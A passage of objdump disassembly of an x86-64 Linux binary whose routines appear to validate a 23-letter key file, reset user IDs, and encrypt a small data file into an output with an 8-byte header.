400dc0: ff 25 9a 22 20 00 jmpq *0x20229a(%rip) # 603060 70 | 400dc6: 68 09 00 00 00 pushq $0x9 71 | 400dcb: e9 50 ff ff ff jmpq 400d20 72 | 73 | 0000000000400dd0 <__libc_start_main@plt>: 74 | 400dd0: ff 25 92 22 20 00 jmpq *0x202292(%rip) # 603068 75 | 400dd6: 68 0a 00 00 00 pushq $0xa 76 | 400ddb: e9 40 ff ff ff jmpq 400d20 77 | 78 | 0000000000400de0 : 79 | 400de0: ff 25 8a 22 20 00 jmpq *0x20228a(%rip) # 603070 80 | 400de6: 68 0b 00 00 00 pushq $0xb 81 | 400deb: e9 30 ff ff ff jmpq 400d20 82 | 83 | 0000000000400df0 : 84 | 400df0: ff 25 82 22 20 00 jmpq *0x202282(%rip) # 603078 85 | 400df6: 68 0c 00 00 00 pushq $0xc 86 | 400dfb: e9 20 ff ff ff jmpq 400d20 87 | 88 | 0000000000400e00 : 89 | 400e00: ff 25 7a 22 20 00 jmpq *0x20227a(%rip) # 603080 90 | 400e06: 68 0d 00 00 00 pushq $0xd 91 | 400e0b: e9 10 ff ff ff jmpq 400d20 92 | 93 | 0000000000400e10 : 94 | 400e10: ff 25 72 22 20 00 jmpq *0x202272(%rip) # 603088 95 | 400e16: 68 0e 00 00 00 pushq $0xe 96 | 400e1b: e9 00 ff ff ff jmpq 400d20 97 | 98 | 0000000000400e20 : 99 | 400e20: ff 25 6a 22 20 00 jmpq *0x20226a(%rip) # 603090 100 | 400e26: 68 0f 00 00 00 pushq $0xf 101 | 400e2b: e9 f0 fe ff ff jmpq 400d20 102 | 103 | 0000000000400e30 <__xstat@plt>: 104 | 400e30: ff 25 62 22 20 00 jmpq *0x202262(%rip) # 603098 105 | 400e36: 68 10 00 00 00 pushq $0x10 106 | 400e3b: e9 e0 fe ff ff jmpq 400d20 107 | 108 | 0000000000400e40 : 109 | 400e40: ff 25 5a 22 20 00 jmpq *0x20225a(%rip) # 6030a0 110 | 400e46: 68 11 00 00 00 pushq $0x11 111 | 400e4b: e9 d0 fe ff ff jmpq 400d20 112 | 113 | 0000000000400e50 : 114 | 400e50: ff 25 52 22 20 00 jmpq *0x202252(%rip) # 6030a8 115 | 400e56: 68 12 00 00 00 pushq $0x12 116 | 400e5b: e9 c0 fe ff ff jmpq 400d20 117 | 118 | 0000000000400e60 : 119 | 400e60: ff 25 4a 22 20 00 jmpq *0x20224a(%rip) # 6030b0 120 | 400e66: 68 13 00 00 00 pushq $0x13 121 | 400e6b: e9 b0 fe ff ff jmpq 400d20 122 | 123 | 0000000000400e70 : 124 | 400e70: ff 25 42 22 20 00 jmpq *0x202242(%rip) # 6030b8 125 | 400e76: 68 14 00 00 00 pushq $0x14 126 | 400e7b: e9 a0 fe ff ff jmpq 400d20 127 | 128 | 0000000000400e80 : 129 | 400e80: ff 25 3a 22 20 00 jmpq *0x20223a(%rip) # 6030c0 130 | 400e86: 68 15 00 00 00 pushq $0x15 131 | 400e8b: e9 90 fe ff ff jmpq 400d20 132 | 133 | 0000000000400e90 : 134 | 400e90: ff 25 32 22 20 00 jmpq *0x202232(%rip) # 6030c8 135 | 400e96: 68 16 00 00 00 pushq $0x16 136 | 400e9b: e9 80 fe ff ff jmpq 400d20 137 | 138 | 0000000000400ea0 <__stack_chk_fail@plt>: 139 | 400ea0: ff 25 2a 22 20 00 jmpq *0x20222a(%rip) # 6030d0 140 | 400ea6: 68 17 00 00 00 pushq $0x17 141 | 400eab: e9 70 fe ff ff jmpq 400d20 142 | 143 | 0000000000400eb0 : 144 | 400eb0: ff 25 22 22 20 00 jmpq *0x202222(%rip) # 6030d8 145 | 400eb6: 68 18 00 00 00 pushq $0x18 146 | 400ebb: e9 60 fe ff ff jmpq 400d20 147 | 148 | 0000000000400ec0 : 149 | 400ec0: ff 25 1a 22 20 00 jmpq *0x20221a(%rip) # 6030e0 150 | 400ec6: 68 19 00 00 00 pushq $0x19 151 | 400ecb: e9 50 fe ff ff jmpq 400d20 152 | 153 | 0000000000400ed0 : 154 | 400ed0: ff 25 12 22 20 00 jmpq *0x202212(%rip) # 6030e8 155 | 400ed6: 68 1a 00 00 00 pushq $0x1a 156 | 400edb: e9 40 fe ff ff jmpq 400d20 157 | 158 | 0000000000400ee0 : 159 | 400ee0: ff 25 0a 22 20 00 jmpq *0x20220a(%rip) # 6030f0 160 | 400ee6: 68 1b 00 00 00 pushq $0x1b 161 | 400eeb: e9 30 fe ff ff jmpq 400d20 162 | 163 | 0000000000400ef0 : 164 | 400ef0: ff 25 02 22 20 00 jmpq *0x202202(%rip) # 6030f8 165 | 400ef6: 68 1c 00 00 00 pushq $0x1c 166 | 400efb: e9 20 fe ff ff jmpq 400d20 167 | 168 | 0000000000400f00 : 169 | 400f00: ff 25 fa 21 20 00 jmpq *0x2021fa(%rip) # 603100 170 | 400f06: 68 1d 00 00 00 pushq $0x1d 171 | 400f0b: e9 10 fe ff ff jmpq 400d20 172 | 173 | 0000000000400f10 : 174 | 400f10: ff 25 f2 21 20 00 jmpq *0x2021f2(%rip) # 603108 175 | 400f16: 68 1e 00 00 00 pushq $0x1e 176 | 400f1b: e9 00 fe ff ff jmpq 400d20 177 | 178 | 0000000000400f20 : 179 | 400f20: ff 25 ea 21 20 00 jmpq *0x2021ea(%rip) # 603110 180 | 400f26: 68 1f 00 00 00 pushq $0x1f 181 | 400f2b: e9 f0 fd ff ff jmpq 400d20 182 | 183 | 0000000000400f30 : 184 | 400f30: ff 25 e2 21 20 00 jmpq *0x2021e2(%rip) # 603118 185 | 400f36: 68 20 00 00 00 pushq $0x20 186 | 400f3b: e9 e0 fd ff ff jmpq 400d20 187 | 188 | 0000000000400f40 : 189 | 400f40: ff 25 da 21 20 00 jmpq *0x2021da(%rip) # 603120 190 | 400f46: 68 21 00 00 00 pushq $0x21 191 | 400f4b: e9 d0 fd ff ff jmpq 400d20 192 | 193 | 0000000000400f50 : 194 | 400f50: ff 25 d2 21 20 00 jmpq *0x2021d2(%rip) # 603128 195 | 400f56: 68 22 00 00 00 pushq $0x22 196 | 400f5b: e9 c0 fd ff ff jmpq 400d20 197 | 198 | Disassembly of section .text: 199 | 200 | 0000000000400f60 <.text>: 201 | 400f60: 31 ed xor %ebp,%ebp 202 | 400f62: 49 89 d1 mov %rdx,%r9 203 | 400f65: 5e pop %rsi 204 | 400f66: 48 89 e2 mov %rsp,%rdx 205 | 400f69: 48 83 e4 f0 and $0xfffffffffffffff0,%rsp 206 | 400f6d: 50 push %rax 207 | 400f6e: 54 push %rsp 208 | 400f6f: 49 c7 c0 e0 1e 40 00 mov $0x401ee0,%r8 209 | 400f76: 48 c7 c1 70 1e 40 00 mov $0x401e70,%rcx 210 | 400f7d: 48 c7 c7 40 1c 40 00 mov $0x401c40,%rdi 211 | 400f84: e8 47 fe ff ff callq 400dd0 <__libc_start_main@plt> 212 | 400f89: f4 hlt 213 | 400f8a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 214 | 400f90: b8 47 31 60 00 mov $0x603147,%eax 215 | 400f95: 55 push %rbp 216 | 400f96: 48 2d 40 31 60 00 sub $0x603140,%rax 217 | 400f9c: 48 83 f8 0e cmp $0xe,%rax 218 | 400fa0: 48 89 e5 mov %rsp,%rbp 219 | 400fa3: 77 02 ja 400fa7 220 | 400fa5: 5d pop %rbp 221 | 400fa6: c3 retq 222 | 400fa7: b8 00 00 00 00 mov $0x0,%eax 223 | 400fac: 48 85 c0 test %rax,%rax 224 | 400faf: 74 f4 je 400fa5 225 | 400fb1: 5d pop %rbp 226 | 400fb2: bf 40 31 60 00 mov $0x603140,%edi 227 | 400fb7: ff e0 jmpq *%rax 228 | 400fb9: 0f 1f 80 00 00 00 00 nopl 0x0(%rax) 229 | 400fc0: b8 40 31 60 00 mov $0x603140,%eax 230 | 400fc5: 55 push %rbp 231 | 400fc6: 48 2d 40 31 60 00 sub $0x603140,%rax 232 | 400fcc: 48 c1 f8 03 sar $0x3,%rax 233 | 400fd0: 48 89 e5 mov %rsp,%rbp 234 | 400fd3: 48 89 c2 mov %rax,%rdx 235 | 400fd6: 48 c1 ea 3f shr $0x3f,%rdx 236 | 400fda: 48 01 d0 add %rdx,%rax 237 | 400fdd: 48 d1 f8 sar %rax 238 | 400fe0: 75 02 jne 400fe4 239 | 400fe2: 5d pop %rbp 240 | 400fe3: c3 retq 241 | 400fe4: ba 00 00 00 00 mov $0x0,%edx 242 | 400fe9: 48 85 d2 test %rdx,%rdx 243 | 400fec: 74 f4 je 400fe2 244 | 400fee: 5d pop %rbp 245 | 400fef: 48 89 c6 mov %rax,%rsi 246 | 400ff2: bf 40 31 60 00 mov $0x603140,%edi 247 | 400ff7: ff e2 jmpq *%rdx 248 | 400ff9: 0f 1f 80 00 00 00 00 nopl 0x0(%rax) 249 | 401000: 80 3d 51 21 20 00 00 cmpb $0x0,0x202151(%rip) # 603158 250 | 401007: 75 11 jne 40101a 251 | 401009: 55 push %rbp 252 | 40100a: 48 89 e5 mov %rsp,%rbp 253 | 40100d: e8 7e ff ff ff callq 400f90 254 | 401012: 5d pop %rbp 255 | 401013: c6 05 3e 21 20 00 01 movb $0x1,0x20213e(%rip) # 603158 256 | 40101a: f3 c3 repz retq 257 | 40101c: 0f 1f 40 00 nopl 0x0(%rax) 258 | 401020: 48 83 3d d8 1d 20 00 cmpq $0x0,0x201dd8(%rip) # 602e00 259 | 401027: 00 260 | 401028: 74 1e je 401048 261 | 40102a: b8 00 00 00 00 mov $0x0,%eax 262 | 40102f: 48 85 c0 test %rax,%rax 263 | 401032: 74 14 je 401048 264 | 401034: 55 push %rbp 265 | 401035: bf 00 2e 60 00 mov $0x602e00,%edi 266 | 40103a: 48 89 e5 mov %rsp,%rbp 267 | 40103d: ff d0 callq *%rax 268 | 40103f: 5d pop %rbp 269 | 401040: e9 7b ff ff ff jmpq 400fc0 270 | 401045: 0f 1f 00 nopl (%rax) 271 | 401048: e9 73 ff ff ff jmpq 400fc0 272 | 40104d: 0f 1f 00 nopl (%rax) 273 | 401050: 55 push %rbp 274 | 401051: 53 push %rbx 275 | 401052: 50 push %rax 276 | 401053: 48 89 f3 mov %rsi,%rbx 277 | 401056: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 278 | 40105d: 00 00 279 | 40105f: 48 89 04 24 mov %rax,(%rsp) 280 | 401063: 31 f6 xor %esi,%esi 281 | 401065: 31 c0 xor %eax,%eax 282 | 401067: e8 d4 fe ff ff callq 400f40 283 | 40106c: 89 c5 mov %eax,%ebp 284 | 40106e: 85 ed test %ebp,%ebp 285 | 401070: 78 59 js 4010cb 286 | 401072: ba 17 00 00 00 mov $0x17,%edx 287 | 401077: 89 ef mov %ebp,%edi 288 | 401079: 48 89 de mov %rbx,%rsi 289 | 40107c: e8 2f fd ff ff callq 400db0 290 | 401081: 48 83 f8 17 cmp $0x17,%rax 291 | 401085: 75 4b jne 4010d2 292 | 401087: 89 ef mov %ebp,%edi 293 | 401089: e8 c2 fc ff ff callq 400d50 294 | 40108e: 31 c0 xor %eax,%eax 295 | 401090: 8a 0c 03 mov (%rbx,%rax,1),%cl 296 | 401093: 80 c1 bf add $0xbf,%cl 297 | 401096: 80 f9 1a cmp $0x1a,%cl 298 | 401099: 73 53 jae 4010ee 299 | 40109b: 48 ff c0 inc %rax 300 | 40109e: 83 f8 16 cmp $0x16,%eax 301 | 4010a1: 7e ed jle 401090 302 | 4010a3: e8 98 fc ff ff callq 400d40 303 | 4010a8: 89 c3 mov %eax,%ebx 304 | 4010aa: e8 11 fe ff ff callq 400ec0 305 | 4010af: 89 c5 mov %eax,%ebp 306 | 4010b1: 89 df mov %ebx,%edi 307 | 4010b3: 89 de mov %ebx,%esi 308 | 4010b5: 89 da mov %ebx,%edx 309 | 4010b7: e8 d4 fd ff ff callq 400e90 310 | 4010bc: 89 ef mov %ebp,%edi 311 | 4010be: 89 ee mov %ebp,%esi 312 | 4010c0: 89 ea mov %ebp,%edx 313 | 4010c2: e8 29 fd ff ff callq 400df0 314 | 4010c7: 31 c0 xor %eax,%eax 315 | 4010c9: eb 40 jmp 40110b 316 | 4010cb: bf f4 1e 40 00 mov $0x401ef4,%edi 317 | 4010d0: eb 2f jmp 401101 318 | 4010d2: 0f 57 c0 xorps %xmm0,%xmm0 319 | 4010d5: 0f 11 03 movups %xmm0,(%rbx) 320 | 4010d8: 48 c7 43 0f 00 00 00 movq $0x0,0xf(%rbx) 321 | 4010df: 00 322 | 4010e0: 89 ef mov %ebp,%edi 323 | 4010e2: e8 69 fc ff ff callq 400d50 324 | 4010e7: bf fc 1e 40 00 mov $0x401efc,%edi 325 | 4010ec: eb 13 jmp 401101 326 | 4010ee: 0f 57 c0 xorps %xmm0,%xmm0 327 | 4010f1: 0f 11 03 movups %xmm0,(%rbx) 328 | 4010f4: 48 c7 43 0f 00 00 00 movq $0x0,0xf(%rbx) 329 | 4010fb: 00 330 | 4010fc: bf 12 1f 40 00 mov $0x401f12,%edi 331 | 401101: e8 6a fc ff ff callq 400d70 332 | 401106: b8 ff ff ff ff mov $0xffffffff,%eax 333 | 40110b: 64 48 8b 0c 25 28 00 mov %fs:0x28,%rcx 334 | 401112: 00 00 335 | 401114: 48 3b 0c 24 cmp (%rsp),%rcx 336 | 401118: 75 07 jne 401121 337 | 40111a: 48 83 c4 08 add $0x8,%rsp 338 | 40111e: 5b pop %rbx 339 | 40111f: 5d pop %rbp 340 | 401120: c3 retq 341 | 401121: e8 7a fd ff ff callq 400ea0 <__stack_chk_fail@plt> 342 | 401126: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 343 | 40112d: 00 00 00 344 | 401130: 55 push %rbp 345 | 401131: 41 57 push %r15 346 | 401133: 41 56 push %r14 347 | 401135: 41 55 push %r13 348 | 401137: 41 54 push %r12 349 | 401139: 53 push %rbx 350 | 40113a: 48 83 ec 18 sub $0x18,%rsp 351 | 40113e: 49 89 cd mov %rcx,%r13 352 | 401141: 49 89 d4 mov %rdx,%r12 353 | 401144: 49 89 f7 mov %rsi,%r15 354 | 401147: 49 89 fe mov %rdi,%r14 355 | 40114a: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 356 | 401151: 00 00 357 | 401153: 48 89 44 24 10 mov %rax,0x10(%rsp) 358 | 401158: bf 28 1f 40 00 mov $0x401f28,%edi 359 | 40115d: 31 f6 xor %esi,%esi 360 | 40115f: 31 c0 xor %eax,%eax 361 | 401161: e8 da fd ff ff callq 400f40 362 | 401166: 89 c5 mov %eax,%ebp 363 | 401168: 85 ed test %ebp,%ebp 364 | 40116a: 78 5b js 4011c7 365 | 40116c: ba 08 00 00 00 mov $0x8,%edx 366 | 401171: 89 ef mov %ebp,%edi 367 | 401173: 4c 89 ee mov %r13,%rsi 368 | 401176: e8 35 fc ff ff callq 400db0 369 | 40117b: 48 89 c3 mov %rax,%rbx 370 | 40117e: 89 ef mov %ebp,%edi 371 | 401180: e8 cb fb ff ff callq 400d50 372 | 401185: 48 83 fb 08 cmp $0x8,%rbx 373 | 401189: 75 3c jne 4011c7 374 | 40118b: e8 70 fd ff ff callq 400f00 375 | 401190: 48 89 c3 mov %rax,%rbx 376 | 401193: e8 78 fd ff ff callq 400f10 377 | 401198: 4c 89 64 24 08 mov %r12,0x8(%rsp) 378 | 40119d: 4c 89 3c 24 mov %r15,(%rsp) 379 | 4011a1: 41 b8 17 00 00 00 mov $0x17,%r8d 380 | 4011a7: 41 b9 07 00 00 00 mov $0x7,%r9d 381 | 4011ad: 48 89 df mov %rbx,%rdi 382 | 4011b0: 48 89 c6 mov %rax,%rsi 383 | 4011b3: 4c 89 ea mov %r13,%rdx 384 | 4011b6: 4c 89 f1 mov %r14,%rcx 385 | 4011b9: e8 d2 fb ff ff callq 400d90 386 | 4011be: 89 c1 mov %eax,%ecx 387 | 4011c0: 31 c0 xor %eax,%eax 388 | 4011c2: 83 f9 20 cmp $0x20,%ecx 389 | 4011c5: 74 0f je 4011d6 390 | 4011c7: bf f4 1e 40 00 mov $0x401ef4,%edi 391 | 4011cc: e8 9f fb ff ff callq 400d70 392 | 4011d1: b8 ff ff ff ff mov $0xffffffff,%eax 393 | 4011d6: 64 48 8b 0c 25 28 00 mov %fs:0x28,%rcx 394 | 4011dd: 00 00 395 | 4011df: 48 3b 4c 24 10 cmp 0x10(%rsp),%rcx 396 | 4011e4: 75 0f jne 4011f5 397 | 4011e6: 48 83 c4 18 add $0x18,%rsp 398 | 4011ea: 5b pop %rbx 399 | 4011eb: 41 5c pop %r12 400 | 4011ed: 41 5d pop %r13 401 | 4011ef: 41 5e pop %r14 402 | 4011f1: 41 5f pop %r15 403 | 4011f3: 5d pop %rbp 404 | 4011f4: c3 retq 405 | 4011f5: e8 a6 fc ff ff callq 400ea0 <__stack_chk_fail@plt> 406 | 4011fa: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 407 | 401200: 41 57 push %r15 408 | 401202: 41 56 push %r14 409 | 401204: 41 55 push %r13 410 | 401206: 41 54 push %r12 411 | 401208: 53 push %rbx 412 | 401209: 48 83 ec 20 sub $0x20,%rsp 413 | 40120d: 48 89 cb mov %rcx,%rbx 414 | 401210: 49 89 d6 mov %rdx,%r14 415 | 401213: 49 89 f7 mov %rsi,%r15 416 | 401216: 49 89 fc mov %rdi,%r12 417 | 401219: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 418 | 401220: 00 00 419 | 401222: 48 89 44 24 18 mov %rax,0x18(%rsp) 420 | 401227: e8 d4 fc ff ff callq 400f00 421 | 40122c: 49 89 c5 mov %rax,%r13 422 | 40122f: e8 dc fc ff ff callq 400f10 423 | 401234: 48 89 5c 24 08 mov %rbx,0x8(%rsp) 424 | 401239: 4c 89 34 24 mov %r14,(%rsp) 425 | 40123d: 41 b8 17 00 00 00 mov $0x17,%r8d 426 | 401243: 41 b9 07 00 00 00 mov $0x7,%r9d 427 | 401249: 4c 89 ef mov %r13,%rdi 428 | 40124c: 48 89 c6 mov %rax,%rsi 429 | 40124f: 4c 89 fa mov %r15,%rdx 430 | 401252: 4c 89 e1 mov %r12,%rcx 431 | 401255: e8 36 fb ff ff callq 400d90 432 | 40125a: 89 c1 mov %eax,%ecx 433 | 40125c: 31 c0 xor %eax,%eax 434 | 40125e: 83 f9 20 cmp $0x20,%ecx 435 | 401261: 74 0f je 401272 436 | 401263: bf f4 1e 40 00 mov $0x401ef4,%edi 437 | 401268: e8 03 fb ff ff callq 400d70 438 | 40126d: b8 ff ff ff ff mov $0xffffffff,%eax 439 | 401272: 64 48 8b 0c 25 28 00 mov %fs:0x28,%rcx 440 | 401279: 00 00 441 | 40127b: 48 3b 4c 24 18 cmp 0x18(%rsp),%rcx 442 | 401280: 75 0e jne 401290 443 | 401282: 48 83 c4 20 add $0x20,%rsp 444 | 401286: 5b pop %rbx 445 | 401287: 41 5c pop %r12 446 | 401289: 41 5d pop %r13 447 | 40128b: 41 5e pop %r14 448 | 40128d: 41 5f pop %r15 449 | 40128f: c3 retq 450 | 401290: e8 0b fc ff ff callq 400ea0 <__stack_chk_fail@plt> 451 | 401295: 66 66 2e 0f 1f 84 00 data16 nopw %cs:0x0(%rax,%rax,1) 452 | 40129c: 00 00 00 00 453 | 4012a0: 48 83 ec 38 sub $0x38,%rsp 454 | 4012a4: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 455 | 4012ab: 00 00 456 | 4012ad: 48 89 44 24 30 mov %rax,0x30(%rsp) 457 | 4012b2: 48 8b 47 0f mov 0xf(%rdi),%rax 458 | 4012b6: 48 89 44 24 0f mov %rax,0xf(%rsp) 459 | 4012bb: 0f 10 07 movups (%rdi),%xmm0 460 | 4012be: 0f 29 04 24 movaps %xmm0,(%rsp) 461 | 4012c2: 48 8b 06 mov (%rsi),%rax 462 | 4012c5: 48 89 44 24 17 mov %rax,0x17(%rsp) 463 | 4012ca: 48 8d 3c 24 lea (%rsp),%rdi 464 | 4012ce: be 1f 00 00 00 mov $0x1f,%esi 465 | 4012d3: e8 98 fb ff ff callq 400e70 466 | 4012d8: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 467 | 4012df: 00 00 468 | 4012e1: 48 3b 44 24 30 cmp 0x30(%rsp),%rax 469 | 4012e6: 75 07 jne 4012ef 470 | 4012e8: 31 c0 xor %eax,%eax 471 | 4012ea: 48 83 c4 38 add $0x38,%rsp 472 | 4012ee: c3 retq 473 | 4012ef: e8 ac fb ff ff callq 400ea0 <__stack_chk_fail@plt> 474 | 4012f4: 66 66 66 2e 0f 1f 84 data16 data16 nopw %cs:0x0(%rax,%rax,1) 475 | 4012fb: 00 00 00 00 00 476 | 401300: 55 push %rbp 477 | 401301: 41 57 push %r15 478 | 401303: 41 56 push %r14 479 | 401305: 41 55 push %r13 480 | 401307: 41 54 push %r12 481 | 401309: 53 push %rbx 482 | 40130a: 48 81 ec b8 01 00 00 sub $0x1b8,%rsp 483 | 401311: 48 89 d5 mov %rdx,%rbp 484 | 401314: 49 89 f6 mov %rsi,%r14 485 | 401317: 48 89 fb mov %rdi,%rbx 486 | 40131a: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax 487 | 401321: 00 00 488 | 401323: 48 89 84 24 b0 01 00 mov %rax,0x1b0(%rsp) 489 | 40132a: 00 490 | 40132b: 8d 41 ff lea -0x1(%rcx),%eax 491 | 40132e: 3d 6f 01 00 00 cmp $0x16f,%eax 492 | 401333: 76 14 jbe 401349 493 | 401335: bf 35 1f 40 00 mov $0x401f35,%edi 494 | 40133a: e8 31 fa ff ff callq 400d70 495 | 40133f: b8 ff ff ff ff mov $0xffffffff,%eax 496 | 401344: e9 c9 03 00 00 jmpq 401712 497 | 401349: 81 f9 6f 01 00 00 cmp $0x16f,%ecx 498 | 40134f: 7f 17 jg 401368 499 | 401351: 48 63 f9 movslq %ecx,%rdi 500 | 401354: 48 01 ef add %rbp,%rdi 501 | 401357: ba 6f 01 00 00 mov $0x16f,%edx 502 | 40135c: 29 ca sub %ecx,%edx 503 | 40135e: 48 ff c2 inc %rdx 504 | 401361: 31 f6 xor %esi,%esi 505 | 401363: e8 c8 f9 ff ff callq 400d30 506 | 401368: 48 8d 7c 24 28 lea 0x28(%rsp),%rdi 507 | 40136d: e8 2e fa ff ff callq 400da0 508 | 401372: 48 8d b4 24 10 01 00 lea 0x110(%rsp),%rsi 509 | 401379: 00 510 | 40137a: 48 89 df mov %rbx,%rdi 511 | 40137d: e8 ce fc ff ff callq 401050 512 | 401382: 31 db xor %ebx,%ebx 513 | 401384: 85 c0 test %eax,%eax 514 | 401386: 41 bd ff ff ff ff mov $0xffffffff,%r13d 515 | 40138c: 0f 85 cf 02 00 00 jne 401661 516 | 401392: c7 44 24 24 80 01 00 movl $0x180,0x24(%rsp) 517 | 401399: 00 518 | 40139a: bf 80 01 00 00 mov $0x180,%edi 519 | 40139f: e8 1c fa ff ff callq 400dc0 520 | 4013a4: 48 89 c3 mov %rax,%rbx 521 | 4013a7: 45 31 ff xor %r15d,%r15d 522 | 4013aa: 48 85 db test %rbx,%rbx 523 | 4013ad: 0f 84 84 03 00 00 je 401737 524 | 4013b3: bf 00 40 00 00 mov $0x4000,%edi 525 | 4013b8: e8 03 fa ff ff callq 400dc0 526 | 4013bd: 49 89 c7 mov %rax,%r15 527 | 4013c0: 4d 85 ff test %r15,%r15 528 | 4013c3: 0f 84 98 02 00 00 je 401661 529 | 4013c9: be 41 02 00 00 mov $0x241,%esi 530 | 4013ce: 31 c0 xor %eax,%eax 531 | 4013d0: 4c 89 f7 mov %r14,%rdi 532 | 4013d3: e8 68 fb ff ff callq 400f40 533 | 4013d8: 41 89 c4 mov %eax,%r12d 534 | 4013db: 45 85 e4 test %r12d,%r12d 535 | 4013de: 0f 88 86 02 00 00 js 40166a 536 | 4013e4: be 49 1f 40 00 mov $0x401f49,%esi 537 | 4013e9: ba 08 00 00 00 mov $0x8,%edx 538 | 4013ee: 44 89 e7 mov %r12d,%edi 539 | 4013f1: e8 3a fb ff ff callq 400f30 540 | 4013f6: 48 83 f8 08 cmp $0x8,%rax 541 | 4013fa: 0f 85 6a 02 00 00 jne 40166a 542 | 401400: 48 8d bc 24 10 01 00 lea 0x110(%rsp),%rdi 543 | 401407: 00 544 | 401408: 48 8d b4 24 60 01 00 lea 0x160(%rsp),%rsi 545 | 40140f: 00 546 | 401410: 48 8d 94 24 50 01 00 lea 0x150(%rsp),%rdx 547 | 401417: 00 548 | 401418: 48 8d 8c 24 30 01 00 lea 0x130(%rsp),%rcx 549 | 40141f: 00 550 | 401420: e8 0b fd ff ff callq 401130 551 | 401425: 85 c0 test %eax,%eax 552 | 401427: 0f 85 3d 02 00 00 jne 40166a 553 | 40142d: 48 8d b4 24 30 01 00 lea 0x130(%rsp),%rsi 554 | 401434: 00 555 | 401435: ba 08 00 00 00 mov $0x8,%edx 556 | 40143a: 44 89 e7 mov %r12d,%edi 557 | 40143d: e8 ee fa ff ff callq 400f30 558 | 401442: 48 83 f8 08 cmp $0x8,%rax 559 | 401446: 0f 85 1e 02 00 00 jne 40166a 560 | 40144c: 48 8b 84 24 1f 01 00 mov 0x11f(%rsp),%rax 561 | 401453: 00 562 | 401454: 48 89 84 24 8f 01 00 mov %rax,0x18f(%rsp) 563 | 40145b: 00 564 | 40145c: 0f 28 84 24 10 01 00 movaps 0x110(%rsp),%xmm0 565 | 401463: 00 566 | 401464: 0f 29 84 24 80 01 00 movaps %xmm0,0x180(%rsp) 567 | 40146b: 00 568 | 40146c: 48 8b 84 24 30 01 00 mov 0x130(%rsp),%rax 569 | 401473: 00 570 | 401474: 48 89 84 24 97 01 00 mov %rax,0x197(%rsp) 571 | 40147b: 00 572 | 40147c: 48 8d bc 24 80 01 00 lea 0x180(%rsp),%rdi 573 | 401483: 00 574 | 401484: 48 8d 94 24 d0 00 00 lea 0xd0(%rsp),%rdx 575 | 40148b: 00 576 | 40148c: be 1f 00 00 00 mov $0x1f,%esi 577 | 401491: e8 da f9 ff ff callq 400e70 578 | 401496: ba 40 00 00 00 mov $0x40,%edx 579 | 40149b: 44 89 e7 mov %r12d,%edi 580 | 40149e: 48 8d b4 24 d0 00 00 lea 0xd0(%rsp),%rsi 581 | 4014a5: 00 582 | 4014a6: e8 85 fa ff ff callq 400f30 583 | 4014ab: 48 83 f8 40 cmp $0x40,%rax 584 | 4014af: 0f 85 b5 01 00 00 jne 40166a 585 | 4014b5: e8 46 fa ff ff callq 400f00 586 | 4014ba: 48 8d 7c 24 28 lea 0x28(%rsp),%rdi 587 | 4014bf: 48 8d 8c 24 60 01 00 lea 0x160(%rsp),%rcx 588 | 4014c6: 00 589 | 4014c7: 4c 8d 84 24 50 01 00 lea 0x150(%rsp),%r8 590 | 4014ce: 00 591 | 4014cf: 31 d2 xor %edx,%edx 592 | 4014d1: 48 89 c6 mov %rax,%rsi 593 | 4014d4: e8 47 fa ff ff callq 400f20 594 | 4014d9: 85 c0 test %eax,%eax 595 | 4014db: 0f 84 89 01 00 00 je 40166a 596 | 4014e1: 48 8d 7c 24 28 lea 0x28(%rsp),%rdi 597 | 4014e6: 48 8d 54 24 24 lea 0x24(%rsp),%rdx 598 | 4014eb: 41 b8 70 01 00 00 mov $0x170,%r8d 599 | 4014f1: 48 89 de mov %rbx,%rsi 600 | 4014f4: 48 89 e9 mov %rbp,%rcx 601 | 4014f7: e8 84 f9 ff ff callq 400e80 602 | 4014fc: 85 c0 test %eax,%eax 603 | 4014fe: 0f 84 66 01 00 00 je 40166a 604 | 401504: 48 63 74 24 24 movslq 0x24(%rsp),%rsi 605 | 401509: 48 01 de add %rbx,%rsi 606 | 40150c: 48 8d 7c 24 28 lea 0x28(%rsp),%rdi 607 | 401511: 48 8d 54 24 20 lea 0x20(%rsp),%rdx 608 | 401516: e8 35 f9 ff ff callq 400e50 609 | 40151b: 85 c0 test %eax,%eax 610 | 40151d: 0f 84 47 01 00 00 je 40166a 611 | 401523: 8b 44 24 24 mov 0x24(%rsp),%eax 612 | 401527: 03 44 24 20 add 0x20(%rsp),%eax 613 | 40152b: 3d 70 01 00 00 cmp $0x170,%eax 614 | 401530: 89 44 24 24 mov %eax,0x24(%rsp) 615 | 401534: 0f 85 30 01 00 00 jne 40166a 616 | 40153a: bf 28 1f 40 00 mov $0x401f28,%edi 617 | 40153f: 31 f6 xor %esi,%esi 618 | 401541: 31 c0 xor %eax,%eax 619 | 401543: e8 f8 f9 ff ff callq 400f40 620 | 401548: 89 44 24 1c mov %eax,0x1c(%rsp) 621 | 40154c: 85 c0 test %eax,%eax 622 | 40154e: 0f 88 16 01 00 00 js 40166a 623 | 401554: c7 44 24 20 00 00 00 movl $0x0,0x20(%rsp) 624 | 40155b: 00 625 | 40155c: 31 c0 xor %eax,%eax 626 | 40155e: 31 c9 xor %ecx,%ecx 627 | 401560: 41 bd ff ff ff ff mov $0xffffffff,%r13d 628 | 401566: 48 89 04 24 mov %rax,(%rsp) 629 | 40156a: 0f b6 84 04 10 01 00 movzbl 0x110(%rsp,%rax,1),%eax 630 | 401571: 00 631 | 401572: 89 44 24 18 mov %eax,0x18(%rsp) 632 | 401576: 83 c0 bf add $0xffffffbf,%eax 633 | 401579: 89 44 24 14 mov %eax,0x14(%rsp) 634 | 40157d: 78 74 js 4015f3 635 | 40157f: 48 8b 04 24 mov (%rsp),%rax 636 | 401583: 48 c1 e0 04 shl $0x4,%rax 637 | 401587: 48 01 d8 add %rbx,%rax 638 | 40158a: 48 89 44 24 08 mov %rax,0x8(%rsp) 639 | 40158f: bd 41 00 00 00 mov $0x41,%ebp 640 | 401594: ba 00 40 00 00 mov $0x4000,%edx 641 | 401599: 8b 7c 24 1c mov 0x1c(%rsp),%edi 642 | 40159d: 4c 89 fe mov %r15,%rsi 643 